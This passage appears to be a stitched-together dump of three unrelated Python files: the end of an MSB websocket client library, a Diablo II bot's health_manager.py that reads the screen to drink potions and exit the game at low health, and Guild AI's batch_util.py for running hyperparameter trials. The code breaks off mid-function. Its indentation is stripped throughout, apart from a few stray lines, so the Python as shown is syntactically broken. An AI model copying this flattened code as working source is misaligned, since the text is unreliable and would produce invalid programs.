else:
logging.error(
str(function.functionId)
+ " already in functions, change function id!"
)
raise Exception("Function with this ID already present: " + str(function.functionId))
def setEventValue(self, eventId, eventValue):
"""Sets the value for an event
Args:
eventId (str): The event id
eventValue (str): The value of the event
"""
if eventId in self.events:
self.events[eventId].dataObject = eventValue
def publish(
self,
eventId,
dataObject=None,
priority=None,
cached=False,
postDate=None,
correlationId=None,
):
"""This function sends the event of the provided event ID.
Optionally the value can be provided, otherwise the last set value will be used.
The priority can also be set, otherwise the standard value for the event's priority will be used.
A postDate can be optionally provided, otherwise the current timestamp will be used.
Args:
eventId (str): The event id
dataObject (:obj:): The value to be published
priority (str, int): The priority of the event (LOW,MEDIUM,HIGH) or (0,1,2)
cached (bool): Specifies whether this event will be added to the cache if the MSB is currently not reachable
postDate (datetime): the post date of the event (e.g. datetime.datetime.utcnow().isoformat()[:-3] + "Z")
correlationId (str): The correlation id of the event used to identify events in multi-step flows
"""
event = {}
event["uuid"] = self.uuid
event["eventId"] = eventId
# update the event value
if dataObject is not None:
self.events[eventId].dataObject = dataObject
event["dataObject"] = self.events[eventId].dataObject
if priority is not None:
self.events[eventId].priority = priority
event["priority"] = self.events[eventId].priority
if postDate is None:
    event["postDate"] = datetime.datetime.utcnow().isoformat()[:-3] + "Z"
else:
    event["postDate"] = postDate
if correlationId is not None:
event["correlationId"] = correlationId
# validate event value
if self.dataFormatValidation and dataObject is not None:
self.validateValueForDataFormat(
event["dataObject"],
self.events[eventId].df,
self.events[eventId].dataFormat,
self.events[eventId].isArray,
)
msg = self.objectToJson(event)
# send event
if self.connected and self.registered:
try:
if self.sockJsFraming:
_msg = self.objectToJson(msg).replace("\\n", "")
self.ws.send('["E ' + _msg[1:-1] + '"]')
else:
self.ws.send("E " + msg)
logging.debug("SENDING: " + msg)
except Exception:
logging.exception("Error, could not send message...")
pass
else:
# or cache event if not connected
if self.eventCacheEnabled and cached:
logging.debug(
"Not connected and/or registered, putting event in cache."
)
if len(self.eventCache) < self.eventCacheSize:
self.eventCache.append(msg)
else:
self.eventCache.pop(0)
self.eventCache.append(msg)
elif cached and not self.eventCacheEnabled:
logging.debug(
"Global cache disabled, message cache flag overridden and discarded."
)
else:
logging.debug("Caching disabled, message discarded.")
@staticmethod
def validateValueForDataFormat(value, df, dataFormat, isArray):
"""Validate the event value to match the specified data format
Args:
value (:obj:): The value of the event to be validated
df (:obj:): The (short) data format of the event
dataFormat (:obj:): The (complex) data format of the event
isArray (bool): Specifies whether the value is an array (list) of the given data format
"""
if isinstance(df, ComplexDataFormat):
if validateValueForComplexDataformat(
value,
dataFormat,
isArray,
):
return True
else:
return False
else:
if validateValueForSimpleDataformat(
value,
df,
isArray,
):
return True
else:
return False
def addConfigParameter(self, key, value, type):
"""Add a new configuration parameter to the client.
Configuration parameters can be used to change client behaviour by changing their values via the MSB GUI.
Args:
key (str): The key (name) of the configuration parameter
value (:obj:): The initial value of the configuration parameter
type (:obj:DataType): The simple data format of the configuration parameter
"""
newParam = getDataType(type)
newParam["type"] = newParam["type"].upper()
if "format" in newParam:
newParam["format"] = newParam["format"].upper()
newParam["value"] = value
self.configuration["parameters"][key] = newParam
def getConfigParameter(self, key):
"""Get the value of a configuration parameter.
Args:
key (str): The key (name) of the configuration parameter
"""
if key in self.configuration["parameters"]:
return self.configuration["parameters"][key]["value"]
else:
logging.warning(
"Cannot get config param for unknown key: " + str(key)
)
raise Exception("Cannot get config param for unknown key: " + str(key))
def changeConfigParameter(self, key, value):
"""Change the value of a configuration parameter.
Args:
key (str): The key (name) of the configuration parameter
value (:obj:): The new value of the configuration parameter
"""
if key in self.configuration["parameters"]:
oldValue = self.configuration["parameters"][key]["value"]
if oldValue != value:
self.configuration["parameters"][key]["value"] = value
if self.connected and self.registered:
self.reRegister()
else:
logging.warning(
"Cannot change config param. Value is already set!"
)
else:
logging.warning(
"Cannot change config param for unknown key: " + str(key)
)
def reRegister(self):
"""Performs a new registration to update the self-description on MSB."""
logging.debug("Reregistering after configuration parameter change...")
if self.sockJsFraming:
_selfd = json.dumps(self.objectToJson(self.getSelfDescription())).replace(
"\\n", ""
)
self.ws.send('["R ' + _selfd[1:-1] + '"]')
else:
self.ws.send("R " + self.objectToJson(self.getSelfDescription()))
def objectToJson(self, object):
"""Converts a python object into a json ovject.
Returns:
json object: The resulting json object
"""
return jsonpickle.encode(object, unpicklable=False)
def getSelfDescription(self):
"""Generate the self description JSON object of the application or smart object."""
self_description = {}
self_description["@class"] = self.service_type
self_description["uuid"] = self.uuid
self_description["name"] = self.name
self_description["description"] = self.description
self_description["token"] = self.token
_ev = []
e_props = ["@id", "id", "dataFormat", "description", "eventId", "name"]
for event in self.events:
current_e_props = []
e = jsonpickle.decode(
jsonpickle.encode(self.events[event], unpicklable=False)
)
for key in e.keys():
if key == "id":
e["@id"] = e["id"]
del e[key]
del e["priority"]
del e["df"]
if e["dataFormat"] is None:
del e["dataFormat"]
del e["isArray"]
for key in e.keys():
current_e_props.append(key)
for key in current_e_props:
if key not in e_props:
# logging.warning(self, 'Remove key from event if invalid in self description: ' + key)
try:
del e[key]
except Exception:
logging.exception("Key not found: " + key)
_ev.append(e)
self_description["events"] = _ev
_fu = []
for function in self.functions:
f = jsonpickle.decode(
jsonpickle.encode(self.functions[function], unpicklable=False)
)
if f["responseEvents"] and len(f["responseEvents"]) > 0:
_re = []
for idx, re in enumerate(f["responseEvents"]):
_re.append(self.events[re].id)
f["responseEvents"] = _re
else:
del f["responseEvents"]
del f["isArray"]
if "implementation" in f:
del f["implementation"]
if f["dataFormat"] is None:
del f["dataFormat"]
_fu.append(f)
self_description["functions"] = _fu
self_description["configuration"] = self.configuration
return self_description
def readConfig(self):
"""Helper function to parse main configuration param by param name from the application.properties file"""
logging.info("Reading configuration from application.properties file")
config = None
if self.applicationPropertiesCustomPath is None:
config = open("application.properties", "r")
else:
config = open(str(self.applicationPropertiesCustomPath), "r")
if config is not None:
for line in config:
configparam = line.split("=")
if configparam[0] == "msb.type":
self.service_type = configparam[1].rstrip()
elif configparam[0] == "msb.name":
self.name = configparam[1].rstrip()
elif configparam[0] == "msb.uuid":
self.uuid = configparam[1].rstrip()
elif configparam[0] == "msb.token":
self.token = configparam[1].rstrip()
elif configparam[0] == "msb.url":
self.msb_url = configparam[1].rstrip()
elif configparam[0] == "msb.description":
self.description = configparam[1].rstrip()
def vadilateEventDataFormat(df):
"""Validates the specified dataformat of an event by using a json schema
Args:
df (:obj:): The data format specified for the event
"""
if df is None:
return True
schema_file = os.path.join(os.path.dirname(__file__), "event_schema.json")
schema = json.loads(open(schema_file).read())
do = {"definitions": json.loads(jsonpickle.encode(df))}
try:
jsonschema.Draft4Validator(schema).validate(do)
except Exception as e:
logging.exception(e)
return False
return True
def vadilateFunctionDataFormat(df):
"""Validates the specified dataformat of a function by using a json schema
Args:
df (:obj:): The data format specified for the function
"""
if df is None:
return True
schema_file = os.path.join(os.path.dirname(__file__), "function_schema.json")
schema = json.loads(open(schema_file).read())
do = {"definitions": json.loads(jsonpickle.encode(df))}
try:
jsonschema.Draft4Validator(schema).validate(do)
except Exception as e:
logging.exception(e)
return False
return True
def validateValueForComplexDataformat(value, dataFormat, isArray):
"""Validate the event value to match the specified complex data format
Args:
value (:obj:): The value of the event to be validated
dataFormat (:obj:): The (complex) data format of the event
isArray (bool): Specifies whether the value is an array of the complex data format
"""
schema = {}
if isArray:
schema["items"] = {}
schema["items"]["$ref"] = dataFormat["dataObject"]["items"]["$ref"]
schema["type"] = "array"
else:
schema["$ref"] = {}
schema["$ref"] = dataFormat["dataObject"]["$ref"]
schema["type"] = "object"
schema["definitions"] = dataFormat
try:
jsonschema.validate(
value,
schema,
format_checker=jsonschema.FormatChecker(),
)
return True
except Exception as e:
logging.error(
"Error validating event: "
+ str(e)
)
return False
def validateValueForSimpleDataformat(value, df, isArray):
"""Validate the event value to match the specified simple data format
Args:
value (:obj:): The value of the event to be validated
df (:obj:): The (short) data format of the event
isArray (bool): Specifies whether the value is an array of the simple data format
"""
if isArray:
try:
if all((type(item) == df) for item in value):
return True
else:
logging.error(
"Error validating event: "
+ "Value in list doesn't fit the required data format: "
+ str(value)
+ ", expected all items to be: "
+ str(df)
)
return False
except Exception:
logging.error(
"Error validating event: "
+ "Value ("
+ str(value)
+ ") is not an array as defined."
)
return False
else:
if type(value) == df:
return True
logging.error(
"Error validating event: "
+ "Value doesn't fit the required data format: "
+ str(value)
+ " = "
+ str(type(value))
+ ", expected: "
+ str(df)
)
return False
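# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative, not part of the library): shows the
# typical call order of the public API defined above. The MSB url, uuid and
# token are placeholders, and the data-format arguments depend on the helpers
# in the accompanying DataFormat/DataType modules.
#
#   client = MsbClient("SmartObject", "<uuid>", "DemoObject", "Demo service", "<token>")
#   client.enableDebug(True)
#   client.addEvent("TEMPERATURE", "Temperature", "Current temperature", "double", 1, False)
#   client.addFunction("setLimit", "Set limit", "Sets the alarm limit",
#                      "double", lambda params: print(params), False, None)
#   client.connect("wss://<msb-host>:8084")
#   client.register()
#   client.publish("TEMPERATURE", 21.5)
# ---------------------------------------------------------------------------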
|
health_manager.py
|
from template_finder import TemplateFinder
from ui import UiManager
from ui import BeltManager
from pather import Location
import cv2
import time
import keyboard
from utils.custom_mouse import mouse
from utils.misc import cut_roi, color_filter, wait
from logger import Logger
from screen import Screen
import numpy as np
import time
from config import Config
class HealthManager:
def __init__(self, screen: Screen, template_finder: TemplateFinder):
self._config = Config()
self._screen = screen
self._template_finder = template_finder
self._ui_manager = UiManager(screen, self._template_finder)
self._belt_manager = None # must be set with the belt manager from bot.py
self._do_monitor = False
self._did_chicken = False
self._last_rejuv = time.time()
self._last_health = time.time()
self._last_mana = time.time()
self._last_merc_healh = time.time()
self._callback = None
self._pausing = True
self._last_chicken_screenshot = None
def stop_monitor(self):
self._do_monitor = False
def set_belt_manager(self, belt_manager: BeltManager):
self._belt_manager = belt_manager
def set_callback(self, callback):
self._callback = callback
def did_chicken(self):
return self._did_chicken
def reset_chicken_flag(self):
self._did_chicken = False
self._pausing = True
def update_location(self, loc: Location):
if loc is not None and type(loc) == str:
bosses = ["shenk", "eldritch", "pindle", "nihlatak", "trav", "arc", "diablo"]
prev_value = self._pausing
self._pausing = not any(substring in loc for substring in bosses)
if self._pausing != prev_value:
debug_str = "pausing" if self._pausing else "active"
Logger.info(f"Health Manager is now {debug_str}")
@staticmethod
def get_health(config: Config, img: np.ndarray) -> float:
health_rec = [config.ui_pos["health_left"], config.ui_pos["health_top"], config.ui_pos["health_width"], config.ui_pos["health_height"]]
health_img = cut_roi(img, health_rec)
# red mask
mask1, _ = color_filter(health_img, [np.array([0, 110, 20]), np.array([2, 255, 255])])
mask2, _ = color_filter(health_img, [np.array([178, 110, 20]), np.array([180, 255, 255])])
mask = cv2.bitwise_or(mask1, mask2)
health_percentage = (float(np.sum(mask)) / mask.size) * (1/255.0)
# green (in case of poison)
mask, _ = color_filter(health_img, [np.array([47, 90, 20]), np.array([54, 255, 255])])
health_percentage_green = (float(np.sum(mask)) / mask.size) * (1/255.0)
return max(health_percentage, health_percentage_green)
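# Illustrative use (assumes `img` is a full game-window screenshot as a BGR
# numpy array, e.g. from Screen.grab()): the returned value is the fraction of
# the health-globe ROI that passes the red (or green, when poisoned) colour
# filter, roughly 0.0 (empty) to 1.0 (full).
#   hp = HealthManager.get_health(Config(), img)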
@staticmethod
def get_mana(config: Config, img: np.ndarray) -> float:
mana_rec = [config.ui_pos["mana_left"], config.ui_pos["mana_top"], config.ui_pos["mana_width"], config.ui_pos["mana_height"]]
mana_img = cut_roi(img, mana_rec)
mask, _ = color_filter(mana_img, [np.array([117, 120, 20]), np.array([121, 255, 255])])
mana_percentage = (float(np.sum(mask)) / mask.size) * (1/255.0)
return mana_percentage
@staticmethod
def get_merc_health(config: Config, img: np.ndarray) -> float:
health_rec = [config.ui_pos["merc_health_left"], config.ui_pos["merc_health_top"], config.ui_pos["merc_health_width"], config.ui_pos["merc_health_height"]]
merc_health_img = cut_roi(img, health_rec)
merc_health_img = cv2.cvtColor(merc_health_img, cv2.COLOR_BGR2GRAY)
_, health_tresh = cv2.threshold(merc_health_img, 5, 255, cv2.THRESH_BINARY)
merc_health_percentage = (float(np.sum(health_tresh)) / health_tresh.size) * (1/255.0)
return merc_health_percentage
def _do_chicken(self, img):
if self._callback is not None:
self._callback()
self._callback = None
if self._config.general["info_screenshots"]:
self._last_chicken_screenshot = "./info_screenshots/info_debug_chicken_" + time.strftime("%Y%m%d_%H%M%S") + ".png"
cv2.imwrite(self._last_chicken_screenshot, img)
# clean up key presses that might be pressed in the run_thread
keyboard.release(self._config.char["stand_still"])
wait(0.02, 0.05)
keyboard.release(self._config.char["show_items"])
wait(0.02, 0.05)
mouse.release(button="left")
wait(0.02, 0.05)
mouse.release(button="right")
time.sleep(0.01)
self._ui_manager.save_and_exit(does_chicken=True)
self._did_chicken = True
self._pausing = True
def start_monitor(self):
Logger.info("Start health monitoring")
self._do_monitor = True
self._did_chicken = False
start = time.time()
while self._do_monitor:
time.sleep(0.1)
# Wait until the flag is reset by main.py
if self._did_chicken or self._pausing: continue
img = self._screen.grab()
# TODO: Check if in town or not! Otherwise risk endless chicken loop
ingame_template_match = self._template_finder.search("WINDOW_INGAME_OFFSET_REFERENCE", img, roi=self._config.ui_roi["window_ingame_ref"], threshold=0.9)
if ingame_template_match.valid:
health_percentage = self.get_health(self._config, img)
mana_percentage = self.get_mana(self._config, img)
# check rejuv
success_drink_rejuv = False
last_drink = time.time() - self._last_rejuv
if (health_percentage < self._config.char["take_rejuv_potion_health"] and last_drink > 1) or \
(mana_percentage < self._config.char["take_rejuv_potion_mana"] and last_drink > 2):
success_drink_rejuv = self._belt_manager.drink_potion("rejuv", stats=[health_percentage, mana_percentage])
self._last_rejuv = time.time()
# in case no rejuv was used, check for chicken, health pot and mana pot usage
if not success_drink_rejuv:
# check health
last_drink = time.time() - self._last_health
if health_percentage < self._config.char["take_health_potion"] and last_drink > 3.5:
self._belt_manager.drink_potion("health", stats=[health_percentage, mana_percentage])
self._last_health = time.time()
# give the chicken a 6 sec delay to allow time for a healing potion and avoid an endless chicken loop
elif health_percentage < self._config.char["chicken"] and (time.time() - start) > 6:
Logger.warning(f"Trying to chicken, player HP {(health_percentage*100):.1f}%!")
self._do_chicken(img)
# check mana
last_drink = time.time() - self._last_mana
if mana_percentage < self._config.char["take_mana_potion"] and last_drink > 4:
self._belt_manager.drink_potion("mana", stats=[health_percentage, mana_percentage])
self._last_mana = time.time()
# check merc
merc_alive = self._template_finder.search(["MERC_A2","MERC_A1","MERC_A5","MERC_A3"], img, roi=self._config.ui_roi["merc_icon"]).valid
if merc_alive:
merc_health_percentage = self.get_merc_health(self._config, img)
last_drink = time.time() - self._last_merc_healh
if merc_health_percentage < self._config.char["merc_chicken"]:
Logger.warning(f"Trying to chicken, merc HP {(merc_health_percentage*100):.1f}%!")
self._do_chicken(img)
if merc_health_percentage < self._config.char["heal_rejuv_merc"] and last_drink > 4.0:
self._belt_manager.drink_potion("rejuv", merc=True, stats=[merc_health_percentage])
self._last_merc_healh = time.time()
elif merc_health_percentage < self._config.char["heal_merc"] and last_drink > 7.0:
self._belt_manager.drink_potion("health", merc=True, stats=[merc_health_percentage])
self._last_merc_healh = time.time()
Logger.debug("Stop health monitoring")
# Testing: Start dying or losing mana and see if it works
if __name__ == "__main__":
import threading
import keyboard
import os
keyboard.add_hotkey('f12', lambda: Logger.info('Exit Health Manager') or os._exit(1))
config = Config()
screen = Screen(config.general["monitor"])
template_finder = TemplateFinder(screen)
belt_manager = BeltManager(screen, template_finder)
manager = HealthManager(screen, template_finder)
manager.set_belt_manager(belt_manager)
manager._pausing = False
Logger.info("Press f12 to exit health manager")
health_monitor_thread = threading.Thread(target=manager.start_monitor)
health_monitor_thread.start()
while 1:
if manager.did_chicken():
manager.stop_monitor()
health_monitor_thread.join()
break
wait(0.5)
|
batch_util.py
|
# Copyright 2017-2022 RStudio, PBC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import csv
import json
import itertools
import logging
import os
import random
import signal
import threading
import six
from guild import _api as gapi
from guild import cli
from guild import exit_code
from guild import flag_util
from guild import lock as locklib
from guild import main
from guild import op_util
from guild import run_util
from guild import util
from guild import var
log = logging.getLogger("guild")
DEFAULT_MAX_TRIALS = 20
DEFAULT_OBJECTIVE = "loss"
RUN_STATUS_LOCK_TIMEOUT = 30
PREV_TRIALS_BATCH = "batch"
PREV_TRIALS_SOURCECODE = "sourcecode"
PREV_TRIALS_OPERATION = "operation"
__trial_running_lock = threading.Lock()
__batch_exiting = threading.Event()
class CurrentRunNotBatchError(Exception):
pass
class InvalidFlagFunctionArgs(Exception):
def __init__(self, name, args, flag_name, msg):
super(InvalidFlagFunctionArgs, self).__init__(msg)
self.function_name = name
self.function_args = args
self.flag_name = flag_name
###################################################################
# Handle trials - run, print, save
###################################################################
def handle_trials(batch_run, trials):
if os.getenv("PRINT_TRIALS_CMD") == "1":
_print_trials_cmd(batch_run, trials)
elif os.getenv("PRINT_TRIALS") == "1":
_print_trials(trials)
elif os.getenv("SAVE_TRIALS"):
_save_trials(trials, os.getenv("SAVE_TRIALS"))
else:
_run_trials(batch_run, trials)
def _print_trials_cmd(batch_run, trials):
from guild.commands import run_impl
for trial in trials:
with util.TempDir() as tmp:
run = init_trial_run(batch_run, trial, tmp.path)
run_impl.run(restart=run.dir, print_cmd=True)
def _print_trials(trials):
if trials:
data, cols = _trials_table_data(trials, format=True)
cli.table(data, cols)
def _trials_table_data(trials, format=False):
names = set()
data = []
maybe_format = flag_util.encode_flag_val if format else lambda x: x
for i, flags in enumerate(trials):
row = {"_trial": i + 1}
data.append(row)
if flags:
row.update({name: maybe_format(flags[name]) for name in flags})
names.update(flags)
heading = {name: name for name in names}
heading["_trial"] = "#"
return [heading] + data, ["_trial"] + sorted(names)
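# Illustrative result of _trials_table_data for two trials with flags
# {"x": 1} and {"x": 2} (format=False):
#   data -> [{"_trial": "#", "x": "x"}, {"_trial": 1, "x": 1}, {"_trial": 2, "x": 2}]
#   cols -> ["_trial", "x"]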
def _save_trials(trials, path):
_root, ext = os.path.splitext(path)
if ext.lower() == ".json":
_save_trials_json(trials, path)
else:
assert ext.lower() in (".csv", ""), "unsupported extension in path '%s'" % path
_save_trials_csv(trials, path)
def _save_trials_json(trials, path):
data, _cols = _trials_table_data(trials, format=False)
with open(path, "w") as f:
json.dump(_strip_trial_nums(data[1:]), f, sort_keys=True)
def _strip_trial_nums(data):
return [{name: row[name] for name in row if name != "_trial"} for row in data]
def _save_trials_csv(trials, path):
data, cols = _trials_table_data(trials, format=True)
with open(path, "w") as f:
out = csv.writer(f, lineterminator="\n")
for row in data:
row_vals = [row.get(name, "") for name in cols if name != "_trial"]
out.writerow(row_vals)
def _run_trials(batch_run, trials):
trial_runs = _init_trial_runs(batch_run, trials)
run_status_lock = locklib.Lock(locklib.RUN_STATUS, timeout=RUN_STATUS_LOCK_TIMEOUT)
for trial_run in trial_runs:
if __batch_exiting.is_set():
break
_try_run_pending_trial(trial_run, batch_run, run_status_lock)
def _init_trial_runs(batch_run, trials):
return [init_trial_run(batch_run, trial) for trial in trials]
def init_trial_run(batch_run, trial_flag_vals, run_dir=None):
run = op_util.init_run(run_dir)
_link_to_trial(batch_run, run)
proto_run = batch_run.batch_proto
assert proto_run, "proto_run not initialized for batch %s (%s)" % (
batch_run.id,
batch_run.dir,
)
util.copytree(proto_run.dir, run.dir)
run.write_attr("flags", trial_flag_vals)
run.write_attr("label", _trial_label(proto_run, trial_flag_vals))
run.write_attr("op", _trial_op_attr(proto_run, trial_flag_vals))
op_util.set_run_pending(run)
op_util.set_run_started(run)
return run
def _link_to_trial(batch_run, trial_run):
trial_link = os.path.join(batch_run.dir, trial_run.id)
rel_trial_path = os.path.relpath(trial_run.dir, os.path.dirname(trial_link))
util.ensure_deleted(trial_link)
os.symlink(rel_trial_path, trial_link)
def _trial_label(proto_run, trial_flag_vals):
label_template = (proto_run.get("op") or {}).get("label_template")
return op_util.run_label(label_template, trial_flag_vals)
def _try_run_pending_trial(trial_run, batch_run, status_lock):
stage = batch_run.get("stage_trials")
with status_lock:
trial_status = trial_run.status
if trial_status != "pending":
log.info(
"Skipping %s because its status is %s",
trial_run.id,
trial_status,
)
return
try:
start_trial_run(trial_run, stage)
except SystemExit as e:
handle_trial_system_exit(e, batch_run, trial_run)
def start_trial_run(run, stage=False):
from guild.commands import run_impl
_log_start_trial(run, stage)
with __trial_running_lock:
run_impl.run(restart=run.id, stage=stage, quiet=stage)
def _trial_op_attr(proto_run, trial_flag_vals):
proto_op_data = proto_run.get("op")
if not proto_op_data:
return None
deps = op_util.op_deps_for_data(proto_op_data.get("deps"))
for dep in deps:
dep.config = trial_flag_vals.get(dep.resdef.name) or dep.config
proto_op_data["deps"] = op_util.op_deps_as_data(deps)
return proto_op_data
def _log_start_trial(run, stage):
desc = "Running" if not stage else "Staging"
log.info(
"%s trial %s: %s (%s)",
desc,
_trial_name(run),
run_util.format_operation(run),
_trial_flags_desc(run),
)
def _trial_name(run):
if util.compare_paths(os.path.dirname(run.dir), var.runs_dir()):
return os.path.basename(run.dir)
else:
return "in %s" % run.dir
def _trial_flags_desc(run):
flags = {
name: val for name, val in (run.get("flags") or {}).items() if val is not None
}
return op_util.flags_desc(flags)
def invalid_flag_function_args_error(e):
raise SystemExit(
"invalid function args in '%s=%s': %s"
% (e.flag_name, _flag_value_for_function(e.function_name, e.function_args), e)
)
def _flag_value_for_function(name, args):
args_list = ":".join([str(arg) for arg in args])
return "%s[%s]" % (name, args_list)
def handle_trial_system_exit(e, batch_run, trial_run):
msg, code = main.system_exit_params(e)
if code == 0:
if msg:
log.info(msg)
elif code == exit_code.SIGTERM:
log.info("Trial %s was terminated", _trial_name(trial_run))
elif code == exit_code.KEYBOARD_INTERRUPT:
log.info("Stopping batch")
raise SystemExit(code)
else:
log.error(
"Trial %s exited with an error%s",
_trial_name(trial_run),
_trial_run_error_desc(code, msg),
)
if fail_on_trial_error(batch_run):
log.error(
"Stopping batch because a trial failed (pending trials "
"can be started as needed)"
)
raise SystemExit(code)
def _trial_run_error_desc(code, msg):
if msg:
return ": (%i) %s" % (code, msg)
else:
return " (%i) - see log for details" % code
def fail_on_trial_error(batch_run):
params = batch_run.get("run_params") or {}
return params.get("fail_on_trial_error")
def run_trial(batch_run, flag_vals):
run = init_trial_run(batch_run, flag_vals)
start_trial_run(run)
return run
###################################################################
# Utils
###################################################################
def is_batch(run):
return os.path.exists(run.guild_path("proto"))
def batch_run():
current_run = gapi.current_run()
if not current_run:
raise CurrentRunNotBatchError("no current run")
proto_path = current_run.guild_path("proto")
if not os.path.exists(proto_path):
raise CurrentRunNotBatchError("missing proto %s" % proto_path)
return current_run
def expand_flags(flag_vals, random_seed=None):
expanded = _expand_flags_base(flag_vals)
_apply_flag_functions(expanded, random_seed)
return expanded
def _expand_flags_base(flag_vals):
"""Expands flag vals without applying flag functions."""
flags_list = [_expand_flag(name, val) for name, val in sorted(flag_vals.items())]
return [dict(flags) for flags in itertools.product(*flags_list)]
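# Illustrative expansion (order follows itertools.product over the sorted flag
# names, so "layers" varies slower than "lr" here):
#   _expand_flags_base({"lr": [0.1, 0.01], "layers": [2, 3]})
#   -> [{"layers": 2, "lr": 0.1}, {"layers": 2, "lr": 0.01},
#       {"layers": 3, "lr": 0.1}, {"layers": 3, "lr": 0.01}]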
def _expand_flag(name, val):
if not isinstance(val, list):
val = [val]
return [(name, _flag_function_or_val(x, name)) for x in val]
def _flag_function_or_val(val, flag_name):
if not isinstance(val, six.string_types):
return val
try:
name, args = flag_util.decode_flag_function(val)
except ValueError:
return val
else:
return _FlagFunction(name, args, flag_name, val)
class _FlagFunction:
def __init__(self, name, args, flag_name, flag_value):
from guild.plugins import skopt_util
self.dim, self.initial = skopt_util.function_dim(name, args, "dummy")
self.flag_name = flag_name
self.flag_value = flag_value
self._applied_initial = False
def apply(self, random_state):
from guild.plugins import skopt_util
if self.initial is not None and not self._applied_initial:
self._applied_initial = True
return self.initial, random_state
try:
res = skopt_util.skopt.dummy_minimize(
lambda *args: 0, [self.dim], n_calls=1, random_state=random_state
)
except Exception as e:
if log.getEffectiveLevel() <= logging.DEBUG:
log.exception(
"apply flag function %s for %s with dim %s",
self.flag_value,
self.flag_name,
self.dim,
)
log.warning(
"error applying function %s for flag %s: %s",
self.flag_value,
self.flag_name,
e,
)
return None, random_state
else:
val = skopt_util.native_python_xs(res.x_iters[0])[0]
return val, res.random_state
def _apply_flag_functions(trials, random_seed):
random_state = random_seed
for flag_vals in trials:
for name, val in flag_vals.items():
if isinstance(val, _FlagFunction):
val, random_state = val.apply(random_state)
flag_vals[name] = val
def expanded_batch_trials(batch_run, random_seed=None):
proto_run = batch_run.batch_proto
flag_vals = proto_run.get("flags") or {}
trials = proto_run.get("trials")
if trials:
user_flag_vals = proto_run.get("user_flags") or {}
return expand_trial_flags(trials, flag_vals, user_flag_vals, random_seed)
else:
return expand_flags(flag_vals, random_seed)
def expand_trial_flags(trials, flag_vals, user_flag_vals, random_seed=None):
expanded = []
for trial_flag_vals in trials:
merged_flags = _merged_trial_flags(trial_flag_vals, flag_vals, user_flag_vals)
expanded.extend(_expand_flags_base(merged_flags))
_apply_flag_functions(expanded, random_seed)
return expanded
def _merged_trial_flags(trial_flag_vals, flag_vals, user_flag_vals):
merged = dict(flag_vals)
merged.update(trial_flag_vals)
merged.update(user_flag_vals)
return merged
def sample_trials(trials, count=None, random_seed=None):
count = count or DEFAULT_MAX_TRIALS
if len(trials) <= count:
return trials
random.seed(random_seed)
# Sample indices and re-sort to preserve original trial order.
sampled_i = random.sample(range(len(trials)), count)
return [trials[i] for i in sorted(sampled_i)]
def trial_results(batch_run, scalars, prev_trials_mode=PREV_TRIALS_BATCH):
return trial_results_for_runs(trial_runs(batch_run, prev_trials_mode), scalars)
def trial_results_for_runs(runs, scalars):
index = _run_index_for_scalars(runs)
return [(run.get("flags"), _result_scalars(run, scalars, index)) for run in runs]
def trial_runs(batch_run, prev_trials_mode=PREV_TRIALS_BATCH):
if prev_trials_mode == PREV_TRIALS_BATCH:
return _batch_trial_runs(batch_run)
elif prev_trials_mode == PREV_TRIALS_SOURCECODE:
return _proto_sourcecode_runs(batch_run)
elif prev_trials_mode == PREV_TRIALS_OPERATION:
return _proto_op_runs(batch_run)
else:
raise ValueError(
"unsupported value for prev_trials_mode: %r" % prev_trials_mode
)
def _batch_trial_runs(batch_run):
"""Returns trial runs associated with a batch run."""
runs = var.runs(
batch_run.dir,
filter=_completed_filter,
sort=["timestamp"],
force_root=True,
)
_apply_batch_runs_realpath(runs)
return runs
def _completed_filter(run):
return run.status == "completed"
def _apply_batch_runs_realpath(runs):
"""Update run dirs to real location from relative location under batch."""
for run in runs:
run.path = util.realpath(run.path)
def _proto_sourcecode_runs(batch_run):
"""Returns runs whose sourcecode digest matches that of a batch proto."""
return var.runs(
filter=_completed_sourcecode_filter(batch_run.batch_proto),
sort=["timestamp"],
)
def _completed_sourcecode_filter(proto_run):
assert proto_run
proto_sourcecode_digest = _proto_sourcecode_digest(proto_run)
def f(run):
run_sourcecode_digest = run.get("sourcecode_digest")
return (
run.status == "completed"
and run_sourcecode_digest == proto_sourcecode_digest
)
return f
def _proto_sourcecode_digest(proto_run):
sourcecode_digest = proto_run.get("sourcecode_digest")
if not sourcecode_digest:
log.error(
"Cannot find runs for batch proto in %s: missing sourcecode digest",
proto_run.dir,
)
raise SystemExit(1)
return sourcecode_digest
def _proto_op_runs(batch_run):
"""Returns runs whose op matches that of a batch proto."""
return var.runs(
filter=_completed_op_filter(batch_run.batch_proto),
sort=["timestamp"],
)
def _completed_op_filter(proto_run):
assert proto_run
proto_opspec = run_util.format_operation(proto_run, nowarn=True)
def f(run):
run_opspec = run_util.format_operation(run, nowarn=True)
return run.status == "completed" and run_opspec == proto_opspec
return f
def _run_index_for_scalars(runs):
from guild import index as indexlib # expensive
index = indexlib.RunIndex()
index.refresh(runs, ["scalar"])
return index
def _result_scalars(run, scalars, index):
return [_run_scalar(run, scalar, index) for scalar in scalars]
def _run_scalar(run, scalar, index):
prefix, tag, qualifier = scalar
return index.run_scalar(run, prefix, tag, qualifier, False)
def handle_system_exit(e):
main.handle_system_exit(e)
def init_logging():
op_util.init_logging()
def objective_scalar(batch_run, default=None):
obj = batch_run.get("objective") or default or DEFAULT_OBJECTIVE
if obj[0] == "-":
return obj[1:], -1
return obj, 1
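# Illustrative: a leading "-" on the objective flips the optimization direction,
# e.g. objective "-val_acc" yields ("val_acc", -1) (maximize val_acc), while the
# default "loss" yields ("loss", 1) (minimize loss).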
def stop_trials_on_sigterm(batch_run):
def handler(_signum, _stack_frame):
# Reset handler for SIGTERM to avoid reentry.
signal.signal(signal.SIGTERM, signal.SIG_DFL)
_start_batch_terminate_thread(batch_run)
signal.signal(signal.SIGTERM, handler)
def _start_batch_terminate_thread(batch_run):
thread = threading.Thread(target=lambda: _terminate_batch(batch_run))
thread.start()
def _terminate_batch(batch_run):
import psutil
__batch_exiting.set()
this_p = psutil.Process()
assert this_p.pid == batch_run.pid, (this_p.pid, batch_run.pid)
children = this_p.children(recursive=True)
for child in children:
log.info("Stopping trial (proc %i)", child.pid)
child.terminate()
_gone, alive = psutil.wait_procs(children, timeout=30)
for child in alive:
